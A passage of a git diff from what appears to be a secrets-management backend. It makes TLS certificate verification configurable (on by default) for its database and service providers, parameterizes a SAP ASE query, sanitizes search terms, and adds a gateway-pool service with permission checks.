axios.delete(`${baseUrl}/api/v1/namespaces/${namespace}/serviceaccounts/${entityId}`, { + await request.delete(`${baseUrl}/api/v1/namespaces/${namespace}/serviceaccounts/${entityId}`, { headers: { "Content-Type": "application/json", ...(providerInputs.authMethod === KubernetesAuthMethod.Gateway @@ -765,7 +769,7 @@ export const KubernetesProvider = ({ providerInputs.ca && providerInputs.sslEnabled ? new https.Agent({ ca: providerInputs.ca, - rejectUnauthorized: true + rejectUnauthorized: providerInputs.sslRejectUnauthorized }) : undefined; @@ -798,7 +802,7 @@ export const KubernetesProvider = ({ } } catch (error) { let errorMessage = error instanceof Error ? error.message : "Unknown error"; - if (axios.isAxiosError(error)) { + if (isAxiosError(error)) { if (error.response) { let { message } = error?.response?.data as unknown as { message?: string }; diff --git a/backend/src/ee/services/dynamic-secret/providers/ldap.ts b/backend/src/ee/services/dynamic-secret/providers/ldap.ts index a71f12ec290..ee7c6f4f510 100644 --- a/backend/src/ee/services/dynamic-secret/providers/ldap.ts +++ b/backend/src/ee/services/dynamic-secret/providers/ldap.ts @@ -56,10 +56,12 @@ export const LdapProvider = (): TDynamicProviderFns => { return new Promise((resolve, reject) => { const client = ldapjs.createClient({ url: providerInputs.url, - tlsOptions: { - ca: providerInputs.ca ? providerInputs.ca : null, - rejectUnauthorized: !!providerInputs.ca - }, + tlsOptions: providerInputs.ca + ? { + ca: providerInputs.ca ? providerInputs.ca : null, + rejectUnauthorized: providerInputs.sslRejectUnauthorized + } + : undefined, reconnect: true, bindDN: providerInputs.binddn, bindCredentials: providerInputs.bindpass diff --git a/backend/src/ee/services/dynamic-secret/providers/models.ts b/backend/src/ee/services/dynamic-secret/providers/models.ts index e2e156e2e67..6b04c0da20b 100644 --- a/backend/src/ee/services/dynamic-secret/providers/models.ts +++ b/backend/src/ee/services/dynamic-secret/providers/models.ts @@ -86,7 +86,8 @@ export const DynamicSecretRedisDBSchema = z.object({ creationStatement: z.string().trim(), revocationStatement: z.string().trim(), renewStatement: z.string().trim().optional(), - ca: z.string().optional() + ca: z.string().optional(), + sslRejectUnauthorized: z.boolean().default(true) }); export const DynamicSecretAwsElastiCacheSchema = z.object({ @@ -96,8 +97,7 @@ export const DynamicSecretAwsElastiCacheSchema = z.object({ region: z.string().trim(), creationStatement: z.string().trim(), - revocationStatement: z.string().trim(), - ca: z.string().optional() + revocationStatement: z.string().trim() }); export const DynamicSecretElasticSearchSchema = z.object({ @@ -119,7 +119,8 @@ export const DynamicSecretElasticSearchSchema = z.object({ }) ]), - ca: z.string().optional() + ca: z.string().optional(), + sslRejectUnauthorized: z.boolean().default(true) }); export const DynamicSecretRabbitMqSchema = z.object({ @@ -131,6 +132,7 @@ export const DynamicSecretRabbitMqSchema = z.object({ password: z.string().trim().min(1), ca: z.string().optional(), + sslRejectUnauthorized: z.boolean().default(true), virtualHost: z.object({ name: z.string().trim().min(1), @@ -176,6 +178,7 @@ export const DynamicSecretSqlDBSchema = z.object({ renewStatement: z.string().trim().optional(), ca: z.string().optional(), sslEnabled: z.boolean().optional(), + sslRejectUnauthorized: z.boolean().default(true), gatewayId: z.string().nullable().optional() }); @@ -224,7 +227,8 @@ export const DynamicSecretCassandraSchema = z.object({ creationStatement: z.string().trim(), revocationStatement: z.string().trim(), renewStatement: z.string().trim().optional(), - ca: z.string().optional() + ca: z.string().optional(), + sslRejectUnauthorized: z.boolean().default(true) }); export const DynamicSecretSapAseSchema = z.object({ @@ -329,6 +333,7 @@ export const DynamicSecretMongoDBSchema = z.object({ password: z.string().min(1).trim(), database: z.string().min(1).trim(), ca: z.string().trim().optional().nullable(), + sslRejectUnauthorized: z.boolean().default(true), roles: z .string() .array() @@ -346,7 +351,8 @@ export const DynamicSecretSapHanaSchema = z.object({ creationStatement: z.string().trim(), revocationStatement: z.string().trim(), renewStatement: z.string().trim().optional(), - ca: z.string().optional() + ca: z.string().optional(), + sslRejectUnauthorized: z.boolean().default(true) }); export const DynamicSecretSnowflakeSchema = z.object({ @@ -402,6 +408,7 @@ export const DynamicSecretAzureSqlDBSchema = z.object({ renewStatement: z.string().trim().optional(), ca: z.string().optional(), sslEnabled: z.boolean().optional(), + sslRejectUnauthorized: z.boolean().default(true), gatewayId: z.string().nullable().optional() }); @@ -411,6 +418,7 @@ export const LdapSchema = z.union([ binddn: z.string().trim().min(1), bindpass: z.string().trim().min(1), ca: z.string().optional(), + sslRejectUnauthorized: z.boolean().default(true), credentialType: z.literal(LdapCredentialType.Dynamic).optional().default(LdapCredentialType.Dynamic), creationLdif: z.string().min(1), revocationLdif: z.string().min(1), @@ -421,6 +429,7 @@ export const LdapSchema = z.union([ binddn: z.string().trim().min(1), bindpass: z.string().trim().min(1), ca: z.string().optional(), + sslRejectUnauthorized: z.boolean().default(true), credentialType: z.literal(LdapCredentialType.Static), rotationLdif: z.string().min(1) }) @@ -438,6 +447,7 @@ export const DynamicSecretKubernetesSchema = z clusterToken: z.string().trim().optional(), ca: z.string().optional(), sslEnabled: z.boolean().default(false), + sslRejectUnauthorized: z.boolean().default(true), credentialType: z.literal(KubernetesCredentialType.Static), serviceAccountName: z.string().trim().min(1), namespace: z @@ -464,6 +474,7 @@ export const DynamicSecretKubernetesSchema = z clusterToken: z.string().trim().optional(), ca: z.string().optional(), sslEnabled: z.boolean().default(false), + sslRejectUnauthorized: z.boolean().default(true), credentialType: z.literal(KubernetesCredentialType.Dynamic), namespace: z .string() diff --git a/backend/src/ee/services/dynamic-secret/providers/mongo-atlas.ts b/backend/src/ee/services/dynamic-secret/providers/mongo-atlas.ts index b4d296f8e11..163a7302ff8 100644 --- a/backend/src/ee/services/dynamic-secret/providers/mongo-atlas.ts +++ b/backend/src/ee/services/dynamic-secret/providers/mongo-atlas.ts @@ -28,7 +28,8 @@ export const MongoAtlasProvider = (): TDynamicProviderFns => { headers: { Accept: "application/vnd.atlas.2023-02-01+json", "Content-Type": "application/json" - } + }, + maxRedirects: 0 }); const digestAuth = createDigestAuthRequestInterceptor( client, diff --git a/backend/src/ee/services/dynamic-secret/providers/mongo-db.ts b/backend/src/ee/services/dynamic-secret/providers/mongo-db.ts index c5442374240..57a2dca5ed1 100644 --- a/backend/src/ee/services/dynamic-secret/providers/mongo-db.ts +++ b/backend/src/ee/services/dynamic-secret/providers/mongo-db.ts @@ -35,7 +35,8 @@ export const MongoDBProvider = (): TDynamicProviderFns => { password: providerInputs.password }, directConnection: !isSrv, - ca: providerInputs.ca || undefined + ca: providerInputs.ca || undefined, + tlsAllowInvalidCertificates: !providerInputs.sslRejectUnauthorized }); return client; }; diff --git a/backend/src/ee/services/dynamic-secret/providers/rabbit-mq.ts b/backend/src/ee/services/dynamic-secret/providers/rabbit-mq.ts index 639453bf31e..d590578191b 100644 --- a/backend/src/ee/services/dynamic-secret/providers/rabbit-mq.ts +++ b/backend/src/ee/services/dynamic-secret/providers/rabbit-mq.ts @@ -92,9 +92,9 @@ export const RabbitMqProvider = (): TDynamicProviderFns => { headers: { "Content-Type": "application/json" }, - + maxRedirects: 0, ...(providerInputs.ca && { - httpsAgent: new https.Agent({ ca: providerInputs.ca, rejectUnauthorized: false }) + httpsAgent: new https.Agent({ ca: providerInputs.ca, rejectUnauthorized: providerInputs.sslRejectUnauthorized }) }) }); diff --git a/backend/src/ee/services/dynamic-secret/providers/redis.ts b/backend/src/ee/services/dynamic-secret/providers/redis.ts index 6f64dd3f089..9860363346f 100644 --- a/backend/src/ee/services/dynamic-secret/providers/redis.ts +++ b/backend/src/ee/services/dynamic-secret/providers/redis.ts @@ -77,8 +77,9 @@ export const RedisDatabaseProvider = (): TDynamicProviderFns => { password: providerInputs.password, ...(providerInputs.ca && { tls: { - rejectUnauthorized: false, - ca: providerInputs.ca + ca: providerInputs.ca, + rejectUnauthorized: providerInputs.sslRejectUnauthorized, + servername: providerInputs.host } }) }); @@ -176,7 +177,7 @@ export const RedisDatabaseProvider = (): TDynamicProviderFns => { const username = entityId; - const revokeStatement = handlebars.compile(providerInputs.revocationStatement)({ username }); + const revokeStatement = handlebars.compile(providerInputs.revocationStatement, { noEscape: true })({ username }); const queries = revokeStatement.toString().split(";").filter(Boolean); try { @@ -204,7 +205,10 @@ export const RedisDatabaseProvider = (): TDynamicProviderFns => { const username = entityId; const expiration = new Date(expireAt).toISOString(); - const renewStatement = handlebars.compile(providerInputs.renewStatement)({ username, expiration }); + const renewStatement = handlebars.compile(providerInputs.renewStatement, { noEscape: true })({ + username, + expiration + }); try { if (renewStatement) { diff --git a/backend/src/ee/services/dynamic-secret/providers/sap-ase.ts b/backend/src/ee/services/dynamic-secret/providers/sap-ase.ts index 549507ae385..c5da910b742 100644 --- a/backend/src/ee/services/dynamic-secret/providers/sap-ase.ts +++ b/backend/src/ee/services/dynamic-secret/providers/sap-ase.ts @@ -158,7 +158,7 @@ export const SapAseProvider = (): TDynamicProviderFns => { const masterClient = await $getClient(providerInputs, true); // Get all processes for this login and kill them. If there are active connections to the database when drop login happens, it will throw an error. - const result = await masterClient.query<{ spid?: string }>(`sp_who '${username}'`); + const result = await masterClient.query<{ spid?: string }>(`sp_who ?`, [username]); if (result && result.length > 0) { for await (const row of result) { diff --git a/backend/src/ee/services/dynamic-secret/providers/sap-hana.ts b/backend/src/ee/services/dynamic-secret/providers/sap-hana.ts index 2995b5be685..ffb25d53bc3 100644 --- a/backend/src/ee/services/dynamic-secret/providers/sap-hana.ts +++ b/backend/src/ee/services/dynamic-secret/providers/sap-hana.ts @@ -51,7 +51,8 @@ export const SapHanaProvider = (): TDynamicProviderFns => { password: providerInputs.password, ...(providerInputs.ca ? { - ca: providerInputs.ca + ca: providerInputs.ca, + rejectUnauthorized: providerInputs.sslRejectUnauthorized } : {}) }); @@ -148,7 +149,7 @@ export const SapHanaProvider = (): TDynamicProviderFns => { const revoke = async (inputs: unknown, username: string) => { const providerInputs = await validateProviderInputs(inputs); const client = await $getClient(providerInputs); - const revokeStatement = handlebars.compile(providerInputs.revocationStatement)({ username }); + const revokeStatement = handlebars.compile(providerInputs.revocationStatement, { noEscape: true })({ username }); const queries = revokeStatement.toString().split(";").filter(Boolean); try { for await (const query of queries) { @@ -182,7 +183,10 @@ export const SapHanaProvider = (): TDynamicProviderFns => { try { const expiration = new Date(expireAt).toISOString(); - const renewStatement = handlebars.compile(providerInputs.renewStatement)({ username: entityId, expiration }); + const renewStatement = handlebars.compile(providerInputs.renewStatement, { noEscape: true })({ + username: entityId, + expiration + }); const queries = renewStatement.toString().split(";").filter(Boolean); for await (const query of queries) { await new Promise((resolve, reject) => { diff --git a/backend/src/ee/services/dynamic-secret/providers/snowflake.ts b/backend/src/ee/services/dynamic-secret/providers/snowflake.ts index 650fe4f8c58..d8ed94921bc 100644 --- a/backend/src/ee/services/dynamic-secret/providers/snowflake.ts +++ b/backend/src/ee/services/dynamic-secret/providers/snowflake.ts @@ -146,7 +146,7 @@ export const SnowflakeProvider = (): TDynamicProviderFns => { const client = await $getClient(providerInputs); try { - const revokeStatement = handlebars.compile(providerInputs.revocationStatement)({ username }); + const revokeStatement = handlebars.compile(providerInputs.revocationStatement, { noEscape: true })({ username }); await new Promise((resolve, reject) => { client.execute({ @@ -181,7 +181,7 @@ export const SnowflakeProvider = (): TDynamicProviderFns => { try { const expiration = getDaysToExpiry(new Date(expireAt)); - const renewStatement = handlebars.compile(providerInputs.renewStatement)({ + const renewStatement = handlebars.compile(providerInputs.renewStatement, { noEscape: true })({ username: entityId, expiration }); diff --git a/backend/src/ee/services/dynamic-secret/providers/sql-database.ts b/backend/src/ee/services/dynamic-secret/providers/sql-database.ts index 7a5505d6584..230dd73b528 100644 --- a/backend/src/ee/services/dynamic-secret/providers/sql-database.ts +++ b/backend/src/ee/services/dynamic-secret/providers/sql-database.ts @@ -147,7 +147,11 @@ export const SqlDatabaseProvider = ({ providerInputs: z.infer & { hostIp: string; originalHost: string } ) => { const ssl = providerInputs.ca - ? { rejectUnauthorized: false, ca: providerInputs.ca, servername: providerInputs.host } + ? { + rejectUnauthorized: providerInputs.sslRejectUnauthorized, + ca: providerInputs.ca, + servername: providerInputs.originalHost + } : undefined; const isMsSQLClient = providerInputs.client === SqlProviders.MsSQL; @@ -185,7 +189,7 @@ export const SqlDatabaseProvider = ({ options: isMsSQLClient ? { ...(providerInputs.sslEnabled !== undefined ? { encrypt: providerInputs.sslEnabled } : {}), - trustServerCertificate: !providerInputs.ca, + trustServerCertificate: !providerInputs.sslRejectUnauthorized, cryptoCredentialsDetails: providerInputs.ca ? { ca: providerInputs.ca } : {} } : undefined @@ -345,7 +349,10 @@ export const SqlDatabaseProvider = ({ originalHost: providerInputs.host }); try { - const revokeStatement = handlebars.compile(providerInputs.revocationStatement)({ username, database }); + const revokeStatement = handlebars.compile(providerInputs.revocationStatement, { noEscape: true })({ + username, + database + }); const queries = revokeStatement.toString().split(";").filter(Boolean); await db.transaction(async (tx) => { for (const query of queries) { @@ -387,7 +394,7 @@ export const SqlDatabaseProvider = ({ const expiration = new Date(expireAt).toISOString(); const { database } = providerInputs; - const renewStatement = handlebars.compile(providerInputs.renewStatement)({ + const renewStatement = handlebars.compile(providerInputs.renewStatement, { noEscape: true })({ username: entityId, expiration, database diff --git a/backend/src/ee/services/email-domain/email-domain-dal.ts b/backend/src/ee/services/email-domain/email-domain-dal.ts index c612f8a3937..f67fbba2740 100644 --- a/backend/src/ee/services/email-domain/email-domain-dal.ts +++ b/backend/src/ee/services/email-domain/email-domain-dal.ts @@ -1,5 +1,6 @@ import { TDbClient } from "@app/db"; import { TableName } from "@app/db/schemas"; +import { sanitizeSqlLikeString } from "@app/lib/fn"; import { ormify, selectAllTableCols } from "@app/lib/knex"; export type TEmailDomainDALFactory = ReturnType; @@ -27,8 +28,8 @@ export const emailDomainDALFactory = (db: TDbClient) => { if (searchTerm) { void query.where((qb) => { void qb - .where(`${TableName.EmailDomains}.domain`, "ilike", `%${searchTerm}%`) - .orWhere(`${TableName.Organization}.name`, "ilike", `%${searchTerm}%`); + .where(`${TableName.EmailDomains}.domain`, "ilike", `%${sanitizeSqlLikeString(searchTerm)}%`) + .orWhere(`${TableName.Organization}.name`, "ilike", `%${sanitizeSqlLikeString(searchTerm)}%`); }); } diff --git a/backend/src/ee/services/gateway-pool/gateway-pool-dal.ts b/backend/src/ee/services/gateway-pool/gateway-pool-dal.ts new file mode 100644 index 00000000000..118b2942936 --- /dev/null +++ b/backend/src/ee/services/gateway-pool/gateway-pool-dal.ts @@ -0,0 +1,94 @@ +import { Knex } from "knex"; + +import { TDbClient } from "@app/db"; +import { TableName } from "@app/db/schemas"; +import { DatabaseError } from "@app/lib/errors"; +import { ormify, selectAllTableCols } from "@app/lib/knex"; + +import { GATEWAY_HEARTBEAT_TIMEOUT_MS } from "../gateway-v2/gateway-v2-constants"; +import { GatewayHealthCheckStatus } from "../gateway-v2/gateway-v2-types"; + +export type TGatewayPoolDALFactory = ReturnType; + +export const gatewayPoolDalFactory = (db: TDbClient) => { + const orm = ormify(db, TableName.GatewayPool); + + const findByOrgIdWithDetails = async (orgId: string) => { + try { + const oneHourAgo = new Date(Date.now() - GATEWAY_HEARTBEAT_TIMEOUT_MS); + + const pools = await db + .replicaNode()(TableName.GatewayPool) + .where(`${TableName.GatewayPool}.orgId`, orgId) + .leftJoin( + TableName.GatewayPoolMembership, + `${TableName.GatewayPool}.id`, + `${TableName.GatewayPoolMembership}.gatewayPoolId` + ) + .leftJoin(TableName.GatewayV2, `${TableName.GatewayPoolMembership}.gatewayId`, `${TableName.GatewayV2}.id`) + .select(selectAllTableCols(TableName.GatewayPool)) + .select( + db.raw(`COUNT(DISTINCT ${TableName.GatewayPoolMembership}."gatewayId") AS "memberCount"`), + db.raw( + `COUNT(DISTINCT CASE WHEN ${TableName.GatewayV2}."heartbeat" > ? AND (${TableName.GatewayV2}."lastHealthCheckStatus" IS NULL OR ${TableName.GatewayV2}."lastHealthCheckStatus" != ?) THEN ${TableName.GatewayPoolMembership}."gatewayId" END) AS "healthyMemberCount"`, + [oneHourAgo, GatewayHealthCheckStatus.Failed] + ), + db.raw( + `COALESCE(array_agg(DISTINCT ${TableName.GatewayPoolMembership}."gatewayId") FILTER (WHERE ${TableName.GatewayPoolMembership}."gatewayId" IS NOT NULL), '{}') AS "memberGatewayIds"` + ) + ) + .groupBy(`${TableName.GatewayPool}.id`) + .orderBy(`${TableName.GatewayPool}.name`, "asc"); + + return pools.map((p) => { + const raw = p as Record; + return { + ...p, + memberCount: Number(raw.memberCount ?? 0), + healthyMemberCount: Number(raw.healthyMemberCount ?? 0), + memberGatewayIds: (raw.memberGatewayIds as string[]) ?? [] + }; + }); + } catch (error) { + throw new DatabaseError({ error, name: `${TableName.GatewayPool}: FindByOrgId` }); + } + }; + + const findByIdWithMembers = async (poolId: string, orgId: string) => { + try { + const pool = await db + .replicaNode()(TableName.GatewayPool) + .where(`${TableName.GatewayPool}.id`, poolId) + .where(`${TableName.GatewayPool}.orgId`, orgId) + .first(); + + if (!pool) return null; + + const members = await db + .replicaNode()(TableName.GatewayPoolMembership) + .where(`${TableName.GatewayPoolMembership}.gatewayPoolId`, poolId) + .join(TableName.GatewayV2, `${TableName.GatewayPoolMembership}.gatewayId`, `${TableName.GatewayV2}.id`) + .select( + `${TableName.GatewayV2}.id`, + `${TableName.GatewayV2}.name`, + `${TableName.GatewayV2}.heartbeat`, + `${TableName.GatewayV2}.lastHealthCheckStatus` + ); + + return { ...pool, gateways: members }; + } catch (error) { + throw new DatabaseError({ error, name: `${TableName.GatewayPool}: FindByIdWithMembers` }); + } + }; + + const countByOrgId = async (orgId: string, tx?: Knex) => { + try { + const result = await (tx || db.replicaNode())(TableName.GatewayPool).where({ orgId }).count("id").first(); + return parseInt(String(result?.count || "0"), 10); + } catch (error) { + throw new DatabaseError({ error, name: `${TableName.GatewayPool}: CountByOrgId` }); + } + }; + + return { ...orm, findByOrgIdWithDetails, findByIdWithMembers, countByOrgId }; +}; diff --git a/backend/src/ee/services/gateway-pool/gateway-pool-membership-dal.ts b/backend/src/ee/services/gateway-pool/gateway-pool-membership-dal.ts new file mode 100644 index 00000000000..d3a4b7b8f8e --- /dev/null +++ b/backend/src/ee/services/gateway-pool/gateway-pool-membership-dal.ts @@ -0,0 +1,37 @@ +import { TDbClient } from "@app/db"; +import { TableName, TGatewaysV2 } from "@app/db/schemas"; +import { DatabaseError } from "@app/lib/errors"; +import { ormify } from "@app/lib/knex"; + +import { GATEWAY_HEARTBEAT_TIMEOUT_MS } from "../gateway-v2/gateway-v2-constants"; +import { GatewayHealthCheckStatus } from "../gateway-v2/gateway-v2-types"; + +export type TGatewayPoolMembershipDALFactory = ReturnType; + +export const gatewayPoolMembershipDalFactory = (db: TDbClient) => { + const orm = ormify(db, TableName.GatewayPoolMembership); + + const findHealthyGatewaysByPoolId = async (poolId: string): Promise => { + try { + const oneHourAgo = new Date(Date.now() - GATEWAY_HEARTBEAT_TIMEOUT_MS); + + const gateways = await db + .replicaNode()(TableName.GatewayPoolMembership) + .where(`${TableName.GatewayPoolMembership}.gatewayPoolId`, poolId) + .join(TableName.GatewayV2, `${TableName.GatewayPoolMembership}.gatewayId`, `${TableName.GatewayV2}.id`) + .where(`${TableName.GatewayV2}.heartbeat`, ">", oneHourAgo) + .where((builder) => { + void builder + .whereNull(`${TableName.GatewayV2}.lastHealthCheckStatus`) + .orWhereNot(`${TableName.GatewayV2}.lastHealthCheckStatus`, GatewayHealthCheckStatus.Failed); + }) + .select(`${TableName.GatewayV2}.*`); + + return gateways as TGatewaysV2[]; + } catch (error) { + throw new DatabaseError({ error, name: `${TableName.GatewayPoolMembership}: FindHealthyGateways` }); + } + }; + + return { ...orm, findHealthyGatewaysByPoolId }; +}; diff --git a/backend/src/ee/services/gateway-pool/gateway-pool-service.ts b/backend/src/ee/services/gateway-pool/gateway-pool-service.ts new file mode 100644 index 00000000000..60b057e1da4 --- /dev/null +++ b/backend/src/ee/services/gateway-pool/gateway-pool-service.ts @@ -0,0 +1,303 @@ +import { ForbiddenError } from "@casl/ability"; + +import { OrganizationActionScope } from "@app/db/schemas"; +import { DatabaseErrorCode } from "@app/lib/error-codes"; +import { BadRequestError, DatabaseError, NotFoundError } from "@app/lib/errors"; +import { logger } from "@app/lib/logger"; +import { OrgServiceActor } from "@app/lib/types"; +import { TIdentityKubernetesAuthDALFactory } from "@app/services/identity-kubernetes-auth/identity-kubernetes-auth-dal"; + +import { TGatewayV2DALFactory } from "../gateway-v2/gateway-v2-dal"; +import { TGatewayV2ServiceFactory } from "../gateway-v2/gateway-v2-service"; +import { TGatewayV2ConnectionDetails } from "../gateway-v2/gateway-v2-types"; +import { TLicenseServiceFactory } from "../license/license-service"; +import { OrgPermissionGatewayPoolActions, OrgPermissionSubjects } from "../permission/org-permission"; +import { TPermissionServiceFactory } from "../permission/permission-service-types"; +import { TGatewayPoolDALFactory } from "./gateway-pool-dal"; +import { TGatewayPoolMembershipDALFactory } from "./gateway-pool-membership-dal"; +import { + TAddGatewayToPoolDTO, + TCreateGatewayPoolDTO, + TDeleteGatewayPoolDTO, + TGetGatewayPoolByIdDTO, + TGetPlatformConnectionDetailsByPoolIdDTO, + TListGatewayPoolsDTO, + TRemoveGatewayFromPoolDTO, + TUpdateGatewayPoolDTO +} from "./gateway-pool-types"; + +type TGatewayPoolServiceFactoryDep = { + gatewayPoolDAL: TGatewayPoolDALFactory; + gatewayPoolMembershipDAL: TGatewayPoolMembershipDALFactory; + gatewayV2DAL: Pick; + gatewayV2Service: Pick; + permissionService: TPermissionServiceFactory; + licenseService: Pick; + identityKubernetesAuthDAL: Pick; +}; + +export type TGatewayPoolServiceFactory = ReturnType; + +export const gatewayPoolServiceFactory = ({ + gatewayPoolDAL, + gatewayPoolMembershipDAL, + gatewayV2DAL, + gatewayV2Service, + permissionService, + licenseService, + identityKubernetesAuthDAL +}: TGatewayPoolServiceFactoryDep) => { + const $checkPermission = async (actor: OrgServiceActor, action: OrgPermissionGatewayPoolActions) => { + const { permission } = await permissionService.getOrgPermission({ + actor: actor.type, + actorId: actor.id, + orgId: actor.orgId, + actorAuthMethod: actor.authMethod, + actorOrgId: actor.orgId, + scope: OrganizationActionScope.Any + }); + ForbiddenError.from(permission).throwUnlessCan(action, OrgPermissionSubjects.GatewayPool); + }; + + const $checkLicense = async (orgId: string) => { + const plan = await licenseService.getPlan(orgId); + if (!plan.gatewayPool) { + throw new BadRequestError({ + message: "Your current plan does not support gateway pools. Please upgrade to an Enterprise plan." + }); + } + }; + + const createGatewayPool = async ({ name, ...actor }: TCreateGatewayPoolDTO) => { + await $checkPermission(actor, OrgPermissionGatewayPoolActions.CreateGatewayPools); + await $checkLicense(actor.orgId); + + try { + const pool = await gatewayPoolDAL.create({ + orgId: actor.orgId, + name + }); + return pool; + } catch (error) { + if ( + error instanceof DatabaseError && + (error as DatabaseError & { code?: string }).code === DatabaseErrorCode.UniqueViolation + ) { + throw new BadRequestError({ + message: `A gateway pool named "${name}" already exists in this organization.` + }); + } + throw error; + } + }; + + const listGatewayPools = async (actor: TListGatewayPoolsDTO) => { + await $checkPermission(actor, OrgPermissionGatewayPoolActions.ListGatewayPools); + await $checkLicense(actor.orgId); + + const pools = await gatewayPoolDAL.findByOrgIdWithDetails(actor.orgId); + + if (pools.length === 0) return []; + + // Add more DAL counts here as pool support expands to other consumers + const [k8sAuthCounts] = await Promise.all([ + Promise.all( + pools.map((pool) => + identityKubernetesAuthDAL.countByGatewayPoolId(pool.id).then((count) => ({ id: pool.id, count })) + ) + ) + ]); + + const countMap = new Map(); + for (const { id, count } of k8sAuthCounts) { + countMap.set(id, (countMap.get(id) ?? 0) + count); + } + + return pools.map((pool) => ({ + ...pool, + connectedResourcesCount: countMap.get(pool.id) ?? 0 + })); + }; + + const getGatewayPoolById = async ({ poolId, ...actor }: TGetGatewayPoolByIdDTO) => { + await $checkPermission(actor, OrgPermissionGatewayPoolActions.ListGatewayPools); + await $checkLicense(actor.orgId); + + const pool = await gatewayPoolDAL.findByIdWithMembers(poolId, actor.orgId); + if (!pool) { + throw new NotFoundError({ message: `Gateway pool with ID ${poolId} not found` }); + } + + return pool; + }; + + const updateGatewayPool = async ({ poolId, name, ...actor }: TUpdateGatewayPoolDTO) => { + await $checkPermission(actor, OrgPermissionGatewayPoolActions.EditGatewayPools); + await $checkLicense(actor.orgId); + + const existingPool = await gatewayPoolDAL.findById(poolId); + if (!existingPool || existingPool.orgId !== actor.orgId) { + throw new NotFoundError({ message: `Gateway pool with ID ${poolId} not found` }); + } + + try { + const updated = await gatewayPoolDAL.updateById(poolId, { + ...(name !== undefined && { name }) + }); + return updated; + } catch (error) { + if ( + error instanceof DatabaseError && + (error as DatabaseError & { code?: string }).code === DatabaseErrorCode.UniqueViolation + ) { + throw new BadRequestError({ message: `A gateway pool named "${name}" already exists in this organization.` }); + } + throw error; + } + }; + + const deleteGatewayPool = async ({ poolId, ...actor }: TDeleteGatewayPoolDTO) => { + await $checkPermission(actor, OrgPermissionGatewayPoolActions.DeleteGatewayPools); + await $checkLicense(actor.orgId); + + const existingPool = await gatewayPoolDAL.findById(poolId); + if (!existingPool || existingPool.orgId !== actor.orgId) { + throw new NotFoundError({ message: `Gateway pool with ID ${poolId} not found` }); + } + + try { + await gatewayPoolDAL.deleteById(poolId); + } catch (error) { + if ( + error instanceof DatabaseError && + (error.error as { code?: string })?.code === DatabaseErrorCode.ForeignKeyViolation + ) { + throw new BadRequestError({ + message: `Cannot delete pool "${existingPool.name}" because it is referenced by one or more consumer configurations. Remove the pool reference from those configs first.` + }); + } + throw error; + } + + return existingPool; + }; + + const addGatewayToPool = async ({ poolId, gatewayId, ...actor }: TAddGatewayToPoolDTO) => { + await $checkPermission(actor, OrgPermissionGatewayPoolActions.EditGatewayPools); + await $checkLicense(actor.orgId); + + const pool = await gatewayPoolDAL.findById(poolId); + if (!pool || pool.orgId !== actor.orgId) { + throw new NotFoundError({ message: `Gateway pool with ID ${poolId} not found` }); + } + + const gateway = await gatewayV2DAL.findById(gatewayId); + if (!gateway || gateway.orgId !== actor.orgId) { + throw new NotFoundError({ message: `Gateway with ID ${gatewayId} not found` }); + } + + try { + const membership = await gatewayPoolMembershipDAL.create({ gatewayPoolId: poolId, gatewayId }); + return { membership, poolName: pool.name, gatewayName: gateway.name }; + } catch (error) { + if ( + error instanceof DatabaseError && + (error as DatabaseError & { code?: string }).code === DatabaseErrorCode.UniqueViolation + ) { + throw new BadRequestError({ message: "This gateway is already a member of the pool." }); + } + throw error; + } + }; + + const removeGatewayFromPool = async ({ poolId, gatewayId, ...actor }: TRemoveGatewayFromPoolDTO) => { + await $checkPermission(actor, OrgPermissionGatewayPoolActions.EditGatewayPools); + await $checkLicense(actor.orgId); + + const pool = await gatewayPoolDAL.findById(poolId); + if (!pool || pool.orgId !== actor.orgId) { + throw new NotFoundError({ message: `Gateway pool with ID ${poolId} not found` }); + } + + const gateway = await gatewayV2DAL.findById(gatewayId); + if (!gateway || gateway.orgId !== actor.orgId) { + throw new NotFoundError({ message: `Gateway with ID ${gatewayId} not found` }); + } + + const [deleted] = await gatewayPoolMembershipDAL.delete({ gatewayPoolId: poolId, gatewayId }); + if (!deleted) { + throw new NotFoundError({ message: "Gateway is not a member of this pool." }); + } + + return { membership: deleted, poolName: pool.name, gatewayName: gateway.name }; + }; + + const pickRandomHealthyGateway = async (poolId: string) => { + const healthyGateways = await gatewayPoolMembershipDAL.findHealthyGatewaysByPoolId(poolId); + if (healthyGateways.length === 0) { + throw new BadRequestError({ + message: "Gateway pool has no healthy gateways." + }); + } + const selected = healthyGateways[Math.floor(Math.random() * healthyGateways.length)]; + logger.info( + { poolId, selectedGatewayId: selected.id }, + `Pool gateway selection: picked gateway [gatewayId=${selected.id}] from pool [poolId=${poolId}]` + ); + return selected; + }; + + const getPlatformConnectionDetailsByPoolId = async ({ + poolId, + targetHost, + targetPort + }: TGetPlatformConnectionDetailsByPoolIdDTO): Promise => { + const pool = await gatewayPoolDAL.findById(poolId); + if (!pool) { + throw new NotFoundError({ message: `Gateway pool with ID ${poolId} not found` }); + } + + const selectedGateway = await pickRandomHealthyGateway(poolId); + + return gatewayV2Service.getPlatformConnectionDetailsByGatewayId({ + gatewayId: selectedGateway.id, + targetHost, + targetPort + }); + }; + + const getConnectedResources = async ({ poolId, ...actor }: TGetGatewayPoolByIdDTO) => { + await $checkPermission(actor, OrgPermissionGatewayPoolActions.ListGatewayPools); + await $checkLicense(actor.orgId); + + const pool = await gatewayPoolDAL.findById(poolId); + if (!pool || pool.orgId !== actor.orgId) { + throw new NotFoundError({ message: `Gateway pool with ID ${poolId} not found` }); + } + + // Add more DAL calls here as pool support expands to other consumers + const kubernetesAuths = await identityKubernetesAuthDAL.findByGatewayPoolId(poolId); + + return { kubernetesAuths }; + }; + + const getConnectedResourcesCount = async (poolId: string): Promise => { + // Add more DAL counts here as pool support expands to other consumers + const k8sAuthCount = await identityKubernetesAuthDAL.countByGatewayPoolId(poolId); + return k8sAuthCount; + }; + + return { + createGatewayPool, + listGatewayPools, + getGatewayPoolById, + updateGatewayPool, + deleteGatewayPool, + addGatewayToPool, + removeGatewayFromPool, + pickRandomHealthyGateway, + getPlatformConnectionDetailsByPoolId, + getConnectedResources, + getConnectedResourcesCount + }; +}; diff --git a/backend/src/ee/services/gateway-pool/gateway-pool-types.ts b/backend/src/ee/services/gateway-pool/gateway-pool-types.ts new file mode 100644 index 00000000000..d6fcf7dc7a5 --- /dev/null +++ b/backend/src/ee/services/gateway-pool/gateway-pool-types.ts @@ -0,0 +1,36 @@ +import { OrgServiceActor } from "@app/lib/types"; + +export type TCreateGatewayPoolDTO = { + name: string; +} & OrgServiceActor; + +export type TListGatewayPoolsDTO = OrgServiceActor; + +export type 